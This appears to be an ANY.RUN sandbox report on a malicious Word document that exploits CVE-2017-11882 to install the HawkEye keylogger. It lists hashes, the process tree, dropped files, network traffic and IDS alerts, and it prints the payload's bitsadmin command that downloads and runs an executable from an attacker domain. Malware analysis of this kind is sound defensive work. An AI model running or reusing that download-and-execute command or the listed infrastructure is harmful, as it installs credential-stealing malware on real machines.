analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

MV OCEAN EXPORTER.doc

Full analysis: https://app.any.run/tasks/86283e15-8c52-4b11-acc4-c7adbf4e2cf7
Verdict: Malicious activity
Threats:

Hawkeye often gets installed in a bundle with other malware. This is a Trojan and keylogger that is used to retrieve private information such as passwords and login credentials. This is an advanced malware that features strong anti-evasion functions.

Analysis date: March 14, 2019, 08:33:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
exploit
CVE-2017-11882
loader
keylogger
hawkeye
stealer
evasion
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

C53D471B70CBCC4D698B1E0AF270AC0C

SHA1:

5F7F4ADE999E3BC19A5DE7135B937C0F196B0187

SHA256:

A1673780273226028DC98F22E07262412B4DAD50D62C1BF34F47E40289E2B8F0

SSDEEP:

6144:K7p1JCaor5eQAMW8zXO0E456gQ+HFK9ANbQEPX+sPdqq9mZiXAMxqE6lJcRwYJhL:X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Hjb.exe (PID: 2408)
      • Hjb.exe (PID: 3904)
    • Actions looks like stealing of personal data

      • vbc.exe (PID: 2608)
      • vbc.exe (PID: 3384)
    • Stealing of credential data

      • vbc.exe (PID: 3384)
      • vbc.exe (PID: 2608)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2148)
    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 2884)
    • Detected Hawkeye Keylogger

      • Hjb.exe (PID: 3904)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2148)
    • Executes scripts

      • Hjb.exe (PID: 3904)
    • Connects to SMTP port

      • Hjb.exe (PID: 3904)
    • Application launched itself

      • Hjb.exe (PID: 2408)
    • Loads DLL from Mozilla Firefox

      • vbc.exe (PID: 2608)
  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 2148)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3072)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3072)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe cmd.exe no specs bitsadmin.exe no specs hjb.exe no specs #HAWKEYE hjb.exe vbc.exe vbc.exe

Process information

PID
CMD
Path
Indicators
Parent process
3072"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MV OCEAN EXPORTER.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2148"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2884cmd.exe /c bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe %USERPROFILE%\Hjb.exe && start %USERPROFILE%\Hjb.exeC:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3408bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe C:\Users\admin\Hjb.exe C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
2408C:\Users\admin\Hjb.exe C:\Users\admin\Hjb.execmd.exe
User:
admin
Company:
Company name
Integrity Level:
MEDIUM
Description:
How is seen in task manager
Exit code:
0
Version:
1.0.0.0
3904"C:\Users\admin\Hjb.exe"C:\Users\admin\Hjb.exe
Hjb.exe
User:
admin
Company:
Company name
Integrity Level:
MEDIUM
Description:
How is seen in task manager
Version:
1.0.0.0
2608"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Hjb.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
3384"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp7577.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Hjb.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual Basic Command Line Compiler
Exit code:
0
Version:
8.0.50727.5420
Total events
1 282
Read events
609
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
5
Unknown types
4

Dropped files

PID
Process
Filename
Type
3072WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDE0D.tmp.cvr
MD5:
SHA256:
3904Hjb.exeC:\Users\admin\AppData\Local\Temp\25291068-43af-3e16-50f6-5889d9ce7904text
MD5:4F8D89971DF7015BA1E9815C512C1336
SHA256:9E350516978E5CB9A9A4788B221F7C5444FC59351ADAA3C45B681FADD89C8738
3072WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2A891164FE91BA6AC05B0BF649A261EA
SHA256:DBE2D12E45090C02E4A69E55CEC720728F1BD7706358E7ED5CE8E9FC4F94AD32
3072WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MV OCEAN EXPORTER.doc.LNKlnk
MD5:905FF4383CD66BD078873CCE7DADF4A6
SHA256:13EA6C12E94D9AFCECCB6EE2C66AB603FEAAFFC87C486C3442E10738497F3D06
3384vbc.exeC:\Users\admin\AppData\Local\Temp\tmp7577.tmptext
MD5:7FB9A9AD0FD9B1E0108ED71FBB276048
SHA256:7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9
2608vbc.exeC:\Users\admin\AppData\Local\Temp\tmp5DE6.tmptext
MD5:C48992AAE0E8FD5463A7B1617B2E0B88
SHA256:04802C51A3EE5E9F7D48462C50B17ABC0E84D54F5525D70E4C904BCC0634C3CE
3072WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:E2EC29D9C2C63614603E6890FE2B1780
SHA256:57692798E28577113F05E0C871D46BFEEA79725650D57F89A1E911E5551E7487
3072WINWORD.EXEC:\Users\admin\Desktop\~$ OCEAN EXPORTER.docpgc
MD5:88BC190874711D95C7F01883CB90B286
SHA256:AFA83840EAD638A5336EEB84BE0890B4CEE935D6D6D98B56D2666CC0ED1F0989
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
200
80.82.222.59:80
http://innovarefining.club/Abiguy/bigg.exe
DE
suspicious
3904
Hjb.exe
GET
200
66.171.248.178:80
http://bot.whatismyipaddress.com/
US
text
15 b
shared
GET
200
80.82.222.59:80
http://innovarefining.club/Abiguy/bigg.exe
DE
executable
867 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3904
Hjb.exe
66.171.248.178:80
bot.whatismyipaddress.com
Alchemy Communications, Inc.
US
malicious
3904
Hjb.exe
202.52.147.118:587
mail.valenciapesquero.com
Global Media Teknologi, PT
ID
suspicious
80.82.222.59:80
innovarefining.club
myLoc managed IT AG
DE
suspicious

DNS requests

Domain
IP
Reputation
innovarefining.club
  • 80.82.222.59
suspicious
bot.whatismyipaddress.com
  • 66.171.248.178
shared
mail.valenciapesquero.com
  • 202.52.147.118
unknown
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3904
Hjb.exe
A Network Trojan was detected
MALWARE [PTsecurity] Spy.HawkEye IP Check
2 ETPRO signatures available at the full report
No debug info